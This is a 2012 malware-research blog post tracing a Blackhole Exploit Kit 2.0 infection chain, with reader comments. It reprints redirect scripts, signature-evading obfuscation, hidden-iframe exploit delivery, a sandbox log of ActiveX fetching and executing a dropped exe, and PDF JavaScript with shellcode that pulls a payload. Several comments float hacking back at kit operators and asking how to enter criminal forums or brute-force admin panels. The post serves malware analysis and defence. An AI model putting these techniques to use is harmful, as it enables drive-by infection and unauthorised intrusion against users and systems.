Saturday, September 22, 2012

Following a lead of "Suspected" Blackhole2 - New changes in plugin detect PDF's infection method, PDF/JavaScript codes

Firstly, special thank's for the first lead to @it4sec! This post is dedicated to all #MalwareMustDie members and supporters for being solid friends!

Assuming the current target is a BlackHole v2.0 infectors online, we picked two urls from blacklist which lead to one infection. This is a story of peeling the threat. But before we continue, one more thing, this post is based on reversing we did while racing with time, sorry if you unhappy with the lack of details, please bare with it. Hope being useful. Here we go:

We got below links, which lead to the same infection case:
h00p://85.18.21.252/cKMXzC0n/index.html
h00p://85.18.21.252/SgcjN3i/index.html
(these information we picked up from blacklist, contact me for source..)
We fetched it :
h00p://85.18.21.252/cKMXzC0n/index.html
--14:18:35--  h00p://85.18.21.252/SgcjN3i/index.html
           => `index.html'
Connecting to 192.168.7.11:8118... connected.
Proxy request sent, awaiting response... 200 OK
Length: 418 [text/html]
14:18:37 (1.51 KB/s) - `index.html' saved [418/418]
To find the below code, contains 4(four) links to js.js file...
<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="h00p://rolandpangrati.com/N65FCWa1/js.js"></script>
<script type="text/javascript" src="h00p://grupo-amaro.com/GpuVcKtR/js.js"></script>
<script type="text/javascript" src="h00p://www.laptopcolorat.com/zeScNpWp/js.js"></script>
<script type="text/javascript" src="h00p://grupocitometria.org.ar/ZfHxvN8N/js.js"></script>

</html>
Those js.js files are identical one to another (diff'ed them all), And looks like the below contents...(to save space, I pasted only two)
--14:19:48--  h00p://rolandpangrati・com/N65FCWa1/js.js
           => `js.js'
Resolving rolandpangrati・com... 89.42.216.137
Connecting to rolandpangrati.com|89.42.216.137|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]
14:19:49 (1.14 MB/s) - `js.js' saved [73/73]

$ cat js.js
document.location='h00p://69.194.192.2O3/links/anybody_miss-knowing.php';

--14:22:56--  http://www.laptopcolorat.com/zeScNpWp/js.js
           => `js.js.1'
Resolving www.laptopcolorat・com... 31.14.23.252
Connecting to www.laptopcolorat.com|31.14.23.252|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]
14:22:57 (2.04 MB/s) - `js.js.1' saved [73/73]

$ cat js.js
document.location='h00p://69.194.192.2O3/links/anybody_miss-knowing.php';
↑So this is the link of the actual landing page (anybody_miss-knowing.php) We saw the obfuscated BlackHole PluginDetect v0.7.8 code written there: ↑the upper parts was the obfuscation code following w/the decoder logic. If you deobfs it well you'll get this "neutralized" code-->>[PASTEBIN] The techniques used in the obfuscation is by hiding them behind "google" element, using tag values to store obfuscation data:
<u 
id="google" 
d0="&4442494b46%3d42142o3o%453j3l3q2c^3h44…
d1="3q144449&403h3r3i14$3e15251645_3q3g3h3…
d2="e2525+163i453q3f@443l3r3q16+4d1g3l432r…
    :
    :    
d93="23d1k1i(33423l443h(1c423d1m1i$423h434…
d94="423q^3r1d4b4d3g_3r3f453p3h$3q441i4742…>
</u>
↑Additional (2012 Sept 24th) log, IMPORTANT! Please be noted, for deobfuscation of the current sample - many automation scheme are failed to deobfs it correctly or hangs, it is because the obfuscation code is having separation the JavaScript - calls/code used, it is a simple strings trick yet works to fools some - signatures. In a similar sample we found the calls - was put in the variable like this:
<html><body><script>
g="getElementById";
ss=String.fromCharCode;
gg="getAttribute";</script>
..and also there was a string manipulation to hide eval() wordings:
{window["e"+"v"+"a"+"l"](s);}
There is a step by step manual deobfuscation here:-->>[PASTEBIN] which can be used as reference for patching many automation. While tracing the infection code of PluginDetect with browser's logic, we will explain only 3 infection routes which can be simulated accordingly. (by the time I got this hint, many objects couldn't be reached.. lack of evidence) 1. Java Exploitation 1.1. Updating/install the java old update 1.6.0/vulnerable version... (I really hope the below url or related urls at sun.com to be deleted soon!)
 <object 
 classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" 
 codebase="h00p://java.sun.com/update/1.6.0/jinstall-6u60-windows-i586.cab#Version=6,0,0,0" 
 WIDTH="200" HEIGHT="200" >
1.2. After your browser is having vulnerable java installed, it downloaded - malicious java zpplet w/zeroday PoC exploiting arbitary exec shellcode to download - other evil binary..
 <PARAM NAME="ARCHIVE" VALUE="h00p://THIS-HOST-ADDRESS/links/anybody_miss-knowing.php?teredt=373402380a&teysll=4740&limflyi=cpsn&ixvr=joucpxn">
 <param name="type" value="application/x-java-applet;version=1.6">
↑by the time we got the url the applet was not accessible anymore so we cannot describe more of it. 2. The vector of the infection using MSXML2.XMLHTTP/CVE-2010-2561: 3.1. Opening ActiveXObject + creating 3 objects of: adodb.stream, Shell.Application, and msxml2.XMLHTTP 3.2. Linked to ./anybody_miss-knowing.php?[specific parameter] to download exploit 3.3. If this exploit works (CVE-2010-2561) will drop you exe (.//..//c175065.exe) 3.4. via ActiveX command ShellExecute will be used to execute the payload (this shellcode was using the format explained in previous post-->>[URL] The logs lof the above steps...
ActiveXObject: msxml2.xmlhttp
ActiveXObject: acropdf.pdf
[HTTP] URL: x.x.x.x/links/anybody_miss-knowing.php?mkk=373402380a&jiypmeg=3f&eawqt=03370302073706343433&ytejxs=0b000300020002 (Status: 200, Referrer: http://69.194.192.203/links/anybody_miss-knowing.php)
[Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (adodb.stream)
ActiveXObject: adodb.stream
[Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (Shell.Application)
ActiveXObject: shell.application
[Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (msxml2.XMLHTTP)
ActiveXObject: msxml2.xmlhttp
[Microsoft XMLHTTP ActiveX] open('GET', 'x.x.x.x/links/anybody_miss-knowing.php?sby=373402380a&ozitwo=03370302073706343433&udyuxlri=04&gvfvizk=azme&gre=prxm', False)
[Microsoft XMLHTTP ActiveX] send
[Microsoft XMLHTTP ActiveX] Fetching from URL x.x.x.x/links/anybody_miss-knowing.php?sby=373402380a&ozitwo=03370302073706343433&udyuxlri=04&gvfvizk=azme&gre=prxm (method: GET)
[Adodb.Stream ActiveX] open
[Adodb.Stream ActiveX] Write
[Adodb.Stream ActiveX] SaveToFile (.//..//c175065・exe)
[Adodb.Stream ActiveX] Close
[Shell.Application ActiveX] ShellExecute command: .//..//c175065・exe
3. PDF Exploitation - Slight New Changes Detected.. We have good sample of this so we can say much. The PluginDetect look at your Adobe versions then drops pdf/exploit But slight changes found compared to prev. code, not using splx() anymore. Reason? Yes, to avoid detection, and that retarded idea works! The way this code detects the adobe version is as below (same as before..):
   PluginDetect.initScript();
   PluginDetect.getVersion(".");
   pdfver=PluginDetect.getVersion("AdobeReader");
Redirect you the download evil pdf url below (same as before..):
 function x(s)
 {
   d=[];
   for(i=O;i<s.length;i++)
   {
     k=(s.charCodeAt(i)-46).toString(16);
     if(k.length==1)k="O"+k;
     d.push(k);
   };
   return d.join("");
 }
 end_redirect=function()
 {
 };
 window.onbeforeunload=function()
or depends on the version go to NEW BHEK2 URL with evil IFRAME now;
   show_pdf2=function(src)
   {
     var pifr=document.createElement('IFRAME');
     pifr.setAttribute('width',1);
     pifr.setAttribute('height',1);
     pifr.setAttribute('src',src);
     document.body.appendChild(pifr)
   };
   show_pdf2(window.location+"?mkk="+x("ebOf8")+"&jiypmeg="+x("m")+"&eawqt=O337O3O2O737O6343433&ytejxs="+x(pdfver.join(".")));
 }
Which was reversed and runs as per below..

[iframe redirection] x.x.x.x/links/anybody_miss-knowing.php -> x.x.x.x/links/anybody_miss-knowing.php?mkk=373402380a&jiypmeg=3f&eawqt=03370302073706343433&ytejxs=0b000300020002
Means the previous pdf version checking used in the BHEK 1.3.2(see below) part was gone, although the same PluginDetect code base is still in use! It is understandable since BHEK2 is using longer format url download w/more parameters.. It's an important evidence to show PluginDetect code was also started to be changed..
   Function spl3(){
  iF (pdFver「O」 > O && pdFver「O」 < 8){
    exec7 = O;
    show_pdF('./data/ap1.php?F=F4dFb')
  }
  else iF ((pdFver「O」 == 8) || (pdFver「O」 == 9 && pdFver「1」 <= 3)){
    exec7 = O;
    show_pdF('./data/ap2.php')
  }
  spl4()
*) There are at least 5 to 6 ways of dropping exploits via this evil plugin in the sample we grabbed only 3(three) infection traces are detected. The PDF Exploit Used (The Java Script part below is having new code..) Like described above it has 2(two) PDF exploit used in the logic of plugin detect, in this case both leads to both files with same logic (diff md5) This PDF has interesting way which wasn't used in previous PDF exploits.. The format is the same, contains three points: javaScript, exploit code & shellcode. Like per pasted below snips: (all code are neutralized/uninfected/useless code..) Exploits:
<<
 /Keywords(3d40401i3d3o3h4244253h463h3q441i…
1l1o1l1o1l1o1l1o1l1o1l1o1l1o1l161f3h463h3q441i443d…
1i463l3h473h42323h42433l3r3q1i443r2r44423l3q3j1c1d…
3d3n1d233o3r48333k3h3h253b2h1l1f4340423d49233o3r48…
3j1i3i423r3p2b3k3d422b3r3g3h1c3f1d234d423h4445423q…
3r3q143b3m1m1c3b2h1l1d4b3b2h1p251b1b233i3r421c3b2h…
292a2929292929292929292929292p29292929292929293548…
3b3o3o1m1f25453q3h433f3d403h1c1b191k1k1b1d233b3o3o…
Shellcode:
 /CreationDate(66,83,e4,fc,fc,85,…
,10,83,c3,05,ff,e3,68,6f,6e,00,00,68,75,…
,70,3a,2f,2f,36,39,2e,31,39,34,2e,31,39,…
>>
JavaScript:
<xfa:script contentType='application/x-javascript'>
with(event){
k=target["eva";+";l";];
if((app.addMenuItem+"").indexOf("Me"+"nuItem")!=-1){a=target.keywords;}
}
s="";
z=a;
for(i=0;i<;a.length;i+=2){
 s+=String.fromCharCode(parseInt(z.substr(i,2),28));}
k(s);
</xfa:script>
Note: I wrote in previous post about the javascript used in PDF like this one, but the logic of PDF/JS used was changed. Please be noted.. The last part of the shellcode was actually the url lead to the payload.. to be dropped in the users with the uri details below:
0x0184 /phttp://x.x.x.x/links/anybody_miss-knowing.php?cmpspxc=373402380a&jwk=03370302073706343433&ntzziqi=03&gbks=coi&swlmlswl=culvtnu
While the collection of these evil junks we analyzed are: PS: I made a mistake to loose PE payload unsaved by proxy operation, couldn't get the payload in the attempt I made afterward, was one time shot.. Sorry for not be able to analyze it.. List of VirusTotal of each unique sample w/initial AV detection ratio: FILENAME MD5 DETECT RATIO ------------------------------------------------------------------------ index.html 9f7ea93cfc911305084c16fb3aeb6517 (18 / 42) js.js 8c53450b115b26d4144eac9d5f11852e ( 0 / 43) anybody_miss-knowing.php 02746b26613d881314d84f3b51d1ad97 ( 3 / 42) acropdf.pdf b72c668b370cc7271094836ad6180d5e ( 8 / 43) acropdf2.pdf f78b18ac786199548e647d94da0555ad ( 8 / 43)
↑Conclusion:

New modification / changes in landing page obfuscated code and some recode in PluginDetect of BHEK2 was starting to be seen, the detection ratio of landing page is currently low for this reported case, so I guess they got what they want, at this moment.

Not a new stuff, but I add anyway, the landing page is being covered well by some steps of forwarder and not to be connected directly to the global link like spam, they currently use a simple redirector for it, which passing the correct parameter to the landing pages and only those redirector urls can be found in spam mails.

And, as per announced in everywhere, the payload download links generated from the BHEK2 landing page is changing to be longer, indeed, but as per written in (@kafeine) site, this findings contains more (3 or 4) parameters per request, not as per one or two long strings as per firstly mentioned elsewhere. See below snips(real case sample):

blah.php?mkk=373402380a&jiypmeg=3f&eawqt=03370302073706343433&ytejxs=0b000300020002
blah.php?teredt=373402380a&teysll=4740&limflyi=cpsn&ixvr=joucpxn
blah.php?sby=373402380a&ozitwo=03370302073706343433&udyuxlri=04&gvfvizk=azme&gre=prxm
Morever about those link is, if you have a lead, then be careful of it, since you may only got one chance to grab it. In dealing with BHEK2, better research those infectors by group rather than doing it alone. I lost my payload because of this reason..

Rerference: (The order is unsorted.. No reason..)

1. Contagio: CVE-2012-4681 samples Original (APT) and Blackhole 2.0 (crime)
2. Malware don't need Coffee: Fast look at an infection by a Blackhole Exploit Kit 2.0
3. Trustwave SpiderLabs: Blackhole Exploit Kit v2
4. Malware don't need Coffee: Behind the Captcha or Inside Blackhole Exploit Kit 2.0 - Exploit Kit Administration Panel
5. XyliBox : Blackhole 2.0

Blackhole Previous Versions:

via Xylibox: v1.20, v1,21, v1.23 & Malware don't need Coffee: v.1.25

#MalwareMustDie!

7 comments:

  1. Great writeup, BH2.0's evasion techniques are very interesting, especially monitor mode...

    ...Which got me thinking, if you could identify a BH kit in monitor mode couldn't you then spam it with spoofed source traffic in an attempt to fill the list with millions of junk entries? The list pushed to clients would soon become unwieldy and full of IPs that belong to potential victims, which would not be targeted as a direct result.

    ReplyDelete
  2. It's exactly one of some vectors that we are thinking right now: vulnerability points.Paunch's technology is nothing compares to what us PenTesters does everyday. The bigger the network, the wider security hole will be, that goes to the current BH as well. We'll see who will cry in the end :-) The harder the field is the more mistakes will occur.Let's join the party?

    ReplyDelete
  3. As I understand (according to 'Malware dont need Coffee') it BH code can be purchased for $700 to be installed on your own server.

    {quote}
    The license for your server:
    -License for 3 months $ 700
    {quote}

    So the PHP code can be bought and studied to find security weaknesses and destroy it..

    Or is it against the rules? :)

    ReplyDelete
  4. It is principal talk. Nice comment.
    As of for me, I ain't waste my honest dime for those morons who poorly "code" these junkcodes which also fooling their crime customers by stealing their traffic (LOL)
    Don't you think it is much merrier by exploiting &
    cracking those? ;-) Those retards who used it will not know what happen, how hard their being hit, by whom, when and where. And that is the biggest punishment ever! Say, from God.

    $ sudo killall -KILL exploitkitd ; mv `grep -lir "$malware" /internet/*` > /dev/null [HIT ENTER]; #MalwareMustDie!!

    ReplyDelete
  5. Agree, for a private researcher it's rather too much to spend his own money on it. But for security industry, like big AV vendor companies or security labs etc.. it could be possible.

    Anyway, people do have access there somehow.
    The guy from 'Malware dont need coffee' for example. His posts contain a lot of details.
    So i suppose he managed somehow to get access there... what do u think?

    btw is there a way to talk to you privately?

    ReplyDelete
  6. Don't worry, I feel comfortable to discuss here which is much accessible from my mobile much more than private ;-))
    So, what do you want to know about malware dont need coffee?
    It has so many information, which specific information you are referring into?

    ReplyDelete
  7. I'm a young researcher and i'd like to dive deeper into this Exploit Kits thing. I'm just trying to understand how could is start.

    As I understand, there are several closed forums where malware is being advertised and traded.

    One I'm aware of (and from where Kafeine posts
    pictures of BH advertising) is 'exploit IN'

    Do you know about other similar playgrounds?
    What are the most active and useful for us, researchers?
    for example in this post http://www.xylibox.com/2012/09/blackhole-20.html the first pic is a screenshot of such a forum..

    What is it's name?

    Further, as i understand it, the admission to those forums is by the reference or so. Could you give me a hint on how i could get in there? May be you could somehow provide me with references, if you have an account there? Or may be you know someone who could help here?

    From his writeups Kafeine seems to possess the copy of it or at least web access to admin console. How do you think he achieved this?

    Did he scan the internet trying to stumble upon it? and then bruteforce login dialog?
    Is IP(s) of main BHEK instance (where rented copies work) known?
    Or how it works?

    ReplyDelete